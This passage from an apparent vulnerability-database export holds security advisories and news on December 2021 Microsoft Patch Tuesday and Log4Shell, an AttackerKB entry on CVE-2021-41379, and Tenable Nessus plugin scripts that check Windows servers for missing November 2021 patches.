\n[CVE-2021-43233](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43233>) | Remote Desktop Client Remote Code Execution Vulnerability | No | No | 7.5 | No \n[CVE-2021-43222](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43222>) | Microsoft Message Queuing Information Disclosure Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-43236](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43236>) | Microsoft Message Queuing Information Disclosure Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-43216](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43216>) | Microsoft Local Security Authority Server (lsasrv) Information Disclosure Vulnerability | No | No | 6.5 | Yes", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-14T22:12:53", "type": "rapid7blog", "title": "Patch Tuesday - December 2021", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40441", "CVE-2021-40452", "CVE-2021-40453", "CVE-2021-4052", "CVE-2021-4053", "CVE-2021-4054", "CVE-2021-4055", "CVE-2021-4056", "CVE-2021-4057", "CVE-2021-4058", "CVE-2021-4059", "CVE-2021-4061", "CVE-2021-4062", "CVE-2021-4063", "CVE-2021-4064", "CVE-2021-4065", "CVE-2021-4066", "CVE-2021-4067", "CVE-2021-4068", "CVE-2021-41333", "CVE-2021-41360", "CVE-2021-41365", "CVE-2021-41379", "CVE-2021-42293", "CVE-2021-42294", "CVE-2021-42295", "CVE-2021-42309", "CVE-2021-42310", "CVE-2021-42311", "CVE-2021-42312", "CVE-2021-42313", "CVE-2021-42314", "CVE-2021-42315", "CVE-2021-42320", "CVE-2021-43207", "CVE-2021-43214", "CVE-2021-43215", "CVE-2021-43216", "CVE-2021-43217", "CVE-2021-43219", "CVE-2021-43222", "CVE-2021-43223", "CVE-2021-43224", "CVE-2021-43225", "CVE-2021-43226", "CVE-2021-43227", "CVE-2021-43228", "CVE-2021-43229", "CVE-2021-43230", "CVE-2021-43231", "CVE-2021-43232", "CVE-2021-43233", "CVE-2021-43234", "CVE-2021-43235", "CVE-2021-43236", "CVE-2021-43237", "CVE-2021-43238", "CVE-2021-43239", "CVE-2021-43240", "CVE-2021-43242", "CVE-2021-43243", "CVE-2021-43244", "CVE-2021-43245", "CVE-2021-43246", "CVE-2021-43247", "CVE-2021-43248", "CVE-2021-43255", "CVE-2021-43256", "CVE-2021-43875", "CVE-2021-43877", "CVE-2021-43880", "CVE-2021-43882", "CVE-2021-43883", "CVE-2021-43888", "CVE-2021-43889", "CVE-2021-43890", "CVE-2021-43891", "CVE-2021-43892", "CVE-2021-43893", "CVE-2021-43896", "CVE-2021-43899", "CVE-2021-43905", "CVE-2021-43907", "CVE-2021-43908", "CVE-2021-44228"], "modified": "2021-12-14T22:12:53", "id": "RAPID7BLOG:B6DE24165AA9AA83EDA117170EDDAD44", "href": "https://blog.rapid7.com/2021/12/14/patch-tuesday-december-2021/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "krebs": [{"lastseen": "2021-12-23T19:27:26", "description": "**Microsoft**, **Adobe**, and **Google** all issued security updates to their products today. The Microsoft patches include six previously disclosed security flaws, and one that is already being actively exploited. But this month&#x27;s Patch Tuesday is overshadowed by the &quot;**Log4Shell**&quot; 0-day exploit in a popular **Java** library that web server administrators are now racing to find and patch amid widespread exploitation of the flaw.\n\n\n\nLog4Shell is the name picked for a critical flaw disclosed Dec. 9 in the popular logging library for Java called &quot;**log4j**,&quot; which is included in a huge number of Java applications. Publicly released exploit code allows an attacker to force a server running a vulnerable log4j library to execute commands, such as downloading malicious software or opening a backdoor connection to the server.\n\nAccording to researchers at **Lunasec**, many, many services are vulnerable to this exploit.\n\n&quot;Cloud services like Steam, Apple iCloud, and apps like Minecraft have already been found to be vulnerable,&quot; Lunasec [wrote](<https://www.lunasec.io/docs/blog/log4j-zero-day/>). &quot;Anybody using Apache Struts is likely vulnerable. We&#x27;ve seen similar vulnerabilities exploited before in breaches like the 2017 Equifax data breach. An extensive list of responses from impacted organizations has been compiled [here](<https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592>).&quot;\n\n&quot;If you run a server built on open-source software, there\u2019s a good chance you are impacted by this vulnerability,&quot; said **Dustin Childs** of Trend Micro&#x27;s Zero Day Initiative. &quot;Check with all the vendors in your enterprise to see if they are impacted and what patches are available.&quot;\n\nPart of the difficulty in patching against the Log4Shell attack is identifying all of the vulnerable web applications, said **Johannes Ullrich**, an incident handler and blogger for the **SANS Internet Storm Center**. &quot;Log4Shell will continue to haunt us for years to come. Dealing with log4shell will be a marathon,&quot; Ullrich said. &quot;Treat it as such.&quot; SANS has [a good walk-through](<https://isc.sans.edu/forums/diary/RCE+in+log4j+Log4Shell+or+how+things+can+get+bad+quickly/28120/>) of how simple yet powerful the exploit can be.\n\n**John Hultquist**, vice president of intelligence analysis at **Mandiant**, said the company has seen Chinese and Iranian state actors leveraging the log4j vulnerability, and that the Iranian actors are particularly aggressive, having taken part in ransomware operations that may be primarily carried out for disruptive purposes rather than financial gain.\n\n&quot;We anticipate other state actors are doing so as well, or preparing to,&quot; Hultquist said. &quot;We believe these actors will work quickly to create footholds in desirable networks for follow-on activity, which may last for some time. In some cases, they will work from a wish list of targets that existed long before this vulnerability was public knowledge. In other cases, desirable targets may be selected after broad targeting.&quot;\n\nResearcher **Kevin Beaumont** had a more lighthearted take on Log4Shell [via Twitter](<https://twitter.com/GossiTheDog/status/1470787395805192199>):\n\n&quot;Basically the perfect ending to cybersecurity in 2021 is a 90s style Java vulnerability in an open source module, written by two volunteers with no funding, used by large cybersecurity vendors, undetected until Minecraft chat got pwned, where nobody knows how to respond properly.&quot;\n\nThe** Cybersecurity and Infrastructure Security Agency** (CISA) has joined with the **FBI**, **National Security Agency** (NSA) and partners abroad in publishing [an advisory](<https://www.cisa.gov/uscert/ncas/alerts/aa21-356a>) to help organizations mitigate Log4Shell and other Log4j-related vulnerabilities.\n\nA half-dozen of the vulnerabilities addressed by Microsoft today earned its most dire &quot;critical&quot; rating, meaning malware or miscreants could exploit the flaws to gain complete, remote control over a vulnerable Windows system with little or no help from users.\n\nThe Windows flaw already seeing active exploitation is [CVE-2021-43890](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43890>), which is a &quot;spoofing&quot; bug in the **Windows AppX installer** on **Windows 10.** Microsoft says it is aware of attempts to exploit this flaw using specially crafted packages to implant malware families like [Emotet](<https://krebsonsecurity.com/?s=Emotet>), [Trickbot](<https://krebsonsecurity.com/?s=trickbot>), and [BazaLoader](<https://www.proofpoint.com/us/blog/threat-insight/bazaflix-bazaloader-fakes-movie-streaming-service>).\n\n**Kevin Breen**, director of threat research for Immersive Labs, said [CVE-2021-43905](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43905>) stands out of this month&#x27;s patch batch.\n\n&quot;Not only for its high [CVSS score](<https://www.techtarget.com/searchsecurity/definition/CVSS-Common-Vulnerability-Scoring-System>) of 9.6, but also because it\u2019s noted as &#x27;exploitation more likely&#x27;,&quot; Breen observed.\n\nMicrosoft also patched [CVE-2021-43883](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43883>), an elevation of privilege vulnerability in Windows Installer.\n\n&quot;This appears to be a fix for a patch bypass of [CVE-2021-41379](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41379>), another elevation of privilege vulnerability in Windows Installer that was reportedly fixed in November,&quot; **Satnam Narang** of Tenable points out. &quot;However, researchers discovered that fix was incomplete, and a proof-of-concept was made public late last month.&quot;\n\nGoogle issued five security fixes for **Chrome**, including one rated critical and three others with high severity. If you\u2019re browsing with Chrome, keep a lookout for when you see an \u201cUpdate\u201d tab appear to the right of the address bar. If it\u2019s been a while since you closed the browser, you might see the Update button turn from green to orange and then red. Green means an update has been available for two days; orange means four days have elapsed, and red means your browser is a week or more behind on important updates. Completely close and restart the browser to install any pending updates.\n\nAlso, Adobe issued patches to correct more than 60 security flaws in [a slew of products,](<https://helpx.adobe.com/security.html>) including Adobe Audition, Lightroom, Media Encoder, Premiere Pro, Prelude, Dimension, After Effects, Photoshop, Connect, Experience Manager and Premiere Rush.\n\nStandard disclaimer: Before you update Windows, _please_ make sure you have backed up your system and/or important files. It\u2019s not uncommon for a Windows update package to hose one\u2019s system or prevent it from booting properly, and some updates have been known to erase or corrupt files.\n\nSo do yourself a favor and backup before installing any patches. Windows 10 even has some [built-in tools](<https://lifehacker.com/how-to-back-up-your-computer-automatically-with-windows-1762867473>) to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once.\n\nAnd if you wish to ensure Windows has been set to pause updating so you can back up your files and/or system before the operating system decides to reboot and install patches on its own schedule, [see this guide](<https://www.computerworld.com/article/3543189/check-to-make-sure-you-have-windows-updates-paused.html>).\n\nIf you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there\u2019s a decent chance other readers have experienced the same and may chime in here with useful tips.\n\nAdditional reading:\n\n[SANS ISC listing](<https://isc.sans.edu/forums/diary/Microsoft+December+2021+Patch+Tuesday/28132/>) of each Microsoft vulnerability patched today, indexed by severity and affected component.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2021-12-14T22:23:44", "type": "krebs", "title": "Microsoft Patch Tuesday, December 2021 Edition", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41379", "CVE-2021-43883", "CVE-2021-43890", "CVE-2021-43905"], "modified": "2021-12-14T22:23:44", "id": "KREBS:4CBEC9501222521F7CCF1D5ECAD51297", "href": "https://krebsonsecurity.com/2021/12/microsoft-patch-tuesday-december-2021-edition/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2022-05-13T17:54:15", "description": "Windows Installer Elevation of Privilege Vulnerability\n\n \n**Recent assessments:** \n \n**NinjaOperator** at November 22, 2021 3:59pm UTC reported:\n\nAccording to Florian Roth: \u201cYou can detect the exploitation of Windows InstallerFileTakeOver LPE CVE-2021-41379 with the published PoC with events from the \u2018Application\u2019 Eventlog \nSearch for EventID 1033 and the keyword \u2018test pkg\u2019 \n<https://twitter.com/cyb3rops/status/1462711685484101634>\n\n**jbaines-r7** at December 03, 2021 7:27pm UTC reported:\n\nAccording to Florian Roth: \u201cYou can detect the exploitation of Windows InstallerFileTakeOver LPE CVE-2021-41379 with the published PoC with events from the \u2018Application\u2019 Eventlog \nSearch for EventID 1033 and the keyword \u2018test pkg\u2019 \n<https://twitter.com/cyb3rops/status/1462711685484101634>\n\n**gwillcox-r7** at November 24, 2021 9:16pm UTC reported:\n\nAccording to Florian Roth: \u201cYou can detect the exploitation of Windows InstallerFileTakeOver LPE CVE-2021-41379 with the published PoC with events from the \u2018Application\u2019 Eventlog \nSearch for EventID 1033 and the keyword \u2018test pkg\u2019 \n<https://twitter.com/cyb3rops/status/1462711685484101634>\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-10T00:00:00", "type": "attackerkb", "title": "CVE-2021-41379", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41379", "CVE-2021-41739", "CVE-2021-41773", "CVE-2021-43883"], "modified": "2021-12-17T00:00:00", "id": "AKB:FE7E2037-F0E0-48D7-8F74-C9682BC04A73", "href": "https://attackerkb.com/topics/7LstI2clmF/cve-2021-41379", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2022-05-24T15:40:55", "description": "The remote Windows host is missing security update 5007246 or cumulative update 5007263. It is, therefore, affected by multiple vulnerabilities:\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-38631, CVE-2021-41371)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-41367, CVE-2021-41370, CVE-2021-41377, CVE-2021-41379, CVE-2021-42278, CVE-2021-42282, CVE-2021-42283, CVE-2021-42287, CVE-2021-42291)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-38666, CVE-2021-42275)", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-11-09T00:00:00", "type": "nessus", "title": "KB5007246: Windows Server 2008 Security Update (November 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-38631", "CVE-2021-38666", "CVE-2021-41367", "CVE-2021-41370", "CVE-2021-41371", "CVE-2021-41377", "CVE-2021-41379", "CVE-2021-42275", "CVE-2021-42278", "CVE-2021-42282", "CVE-2021-42283", "CVE-2021-42287", "CVE-2021-42291"], "modified": "2022-05-09T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_NOV_5007246.NASL", "href": "https://www.tenable.com/plugins/nessus/154983", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154983);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/09\");\n\n script_cve_id(\n \"CVE-2021-38631\",\n \"CVE-2021-38666\",\n \"CVE-2021-41367\",\n \"CVE-2021-41370\",\n \"CVE-2021-41371\",\n \"CVE-2021-41377\",\n \"CVE-2021-41379\",\n \"CVE-2021-42275\",\n \"CVE-2021-42278\",\n \"CVE-2021-42282\",\n \"CVE-2021-42283\",\n \"CVE-2021-42287\",\n \"CVE-2021-42291\"\n );\n script_xref(name:\"MSKB\", value:\"5007246\");\n script_xref(name:\"MSKB\", value:\"5007263\");\n script_xref(name:\"MSFT\", value:\"MS21-5007246\");\n script_xref(name:\"MSFT\", value:\"MS21-5007263\");\n script_xref(name:\"IAVA\", value:\"2021-A-0539-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0545-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/02\");\n\n script_name(english:\"KB5007246: Windows Server 2008 Security Update (November 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5007246\nor cumulative update 5007263. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-38631, CVE-2021-41371)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-41367, CVE-2021-41370, CVE-2021-41377,\n CVE-2021-41379, CVE-2021-42278, CVE-2021-42282,\n CVE-2021-42283, CVE-2021-42287, CVE-2021-42291)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-38666,\n CVE-2021-42275)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5007246\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5007246 or Cumulative Update KB5007263.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-38666\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-42291\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/11/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS21-11\";\nkbs = make_list('5007246', '5007263');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_WARNING);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.0\",\n sp:2,\n rollup_date:'11_2021',\n bulletin:bulletin,\n rollup_kb_list:[5007246, 5007263])\n \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_warning();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-24T15:40:56", "description": "The remote Windows host is missing security update 5007233 or cumulative update 5007236. It is, therefore, affected by multiple vulnerabilities:\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-38631, CVE-2021-38665, CVE-2021-41371)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-41367, CVE-2021-41370, CVE-2021-41377, CVE-2021-41379, CVE-2021-42278, CVE-2021-42282, CVE-2021-42283, CVE-2021-42285, CVE-2021-42287, CVE-2021-42291)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-38666, CVE-2021-42275)", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-11-09T00:00:00", "type": "nessus", "title": "KB5007233: Windows Server 2008 R2 Security Update (November 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-38631", "CVE-2021-38665", "CVE-2021-38666", "CVE-2021-41367", "CVE-2021-41370", "CVE-2021-41371", "CVE-2021-41377", "CVE-2021-41379", "CVE-2021-42275", "CVE-2021-42278", "CVE-2021-42282", "CVE-2021-42283", "CVE-2021-42285", "CVE-2021-42287", "CVE-2021-42291"], "modified": "2022-05-09T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_NOV_5007233.NASL", "href": "https://www.tenable.com/plugins/nessus/154984", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154984);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/09\");\n\n script_cve_id(\n \"CVE-2021-38631\",\n \"CVE-2021-38665\",\n \"CVE-2021-38666\",\n \"CVE-2021-41367\",\n \"CVE-2021-41370\",\n \"CVE-2021-41371\",\n \"CVE-2021-41377\",\n \"CVE-2021-41379\",\n \"CVE-2021-42275\",\n \"CVE-2021-42278\",\n \"CVE-2021-42282\",\n \"CVE-2021-42283\",\n \"CVE-2021-42285\",\n \"CVE-2021-42287\",\n \"CVE-2021-42291\"\n );\n script_xref(name:\"MSKB\", value:\"5007233\");\n script_xref(name:\"MSKB\", value:\"5007236\");\n script_xref(name:\"MSFT\", value:\"MS21-5007233\");\n script_xref(name:\"MSFT\", value:\"MS21-5007236\");\n script_xref(name:\"IAVA\", value:\"2021-A-0539-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0545-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/02\");\n\n script_name(english:\"KB5007233: Windows Server 2008 R2 Security Update (November 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5007233\nor cumulative update 5007236. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-38631, CVE-2021-38665,\n CVE-2021-41371)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-41367, CVE-2021-41370, CVE-2021-41377,\n CVE-2021-41379, CVE-2021-42278, CVE-2021-42282,\n CVE-2021-42283, CVE-2021-42285, CVE-2021-42287,\n CVE-2021-42291)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-38666,\n CVE-2021-42275)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5007233\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5007233 or Cumulative Update KB5007236.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-42285\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-42291\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/11/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS21-11\";\nkbs = make_list('5007233', '5007236');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.1\",\n sp:1,\n rollup_date:'11_2021',\n bulletin:bulletin,\n rollup_kb_list:[5007233, 5007236])\n \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-24T15:40:08", "description": "The remote Windows host is missing security update 5007245 or cumulative update 5007245. It is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-41366, CVE-2021-41367, CVE-2021-41370, CVE-2021-41377, CVE-2021-41379, CVE-2021-42278, CVE-2021-42282, CVE-2021-42283, CVE-2021-42285, CVE-2021-42287, CVE-2021-42291)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-38631, CVE-2021-38665, CVE-2021-41371)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-38666, CVE-2021-42275)", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-11-09T00:00:00", "type": "nessus", "title": "KB5007245: Windows Server 2012 Security Update (November 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-38631", "CVE-2021-38665", "CVE-2021-38666", "CVE-2021-41366", "CVE-2021-41367", "CVE-2021-41370", "CVE-2021-41371", "CVE-2021-41377", "CVE-2021-41379", 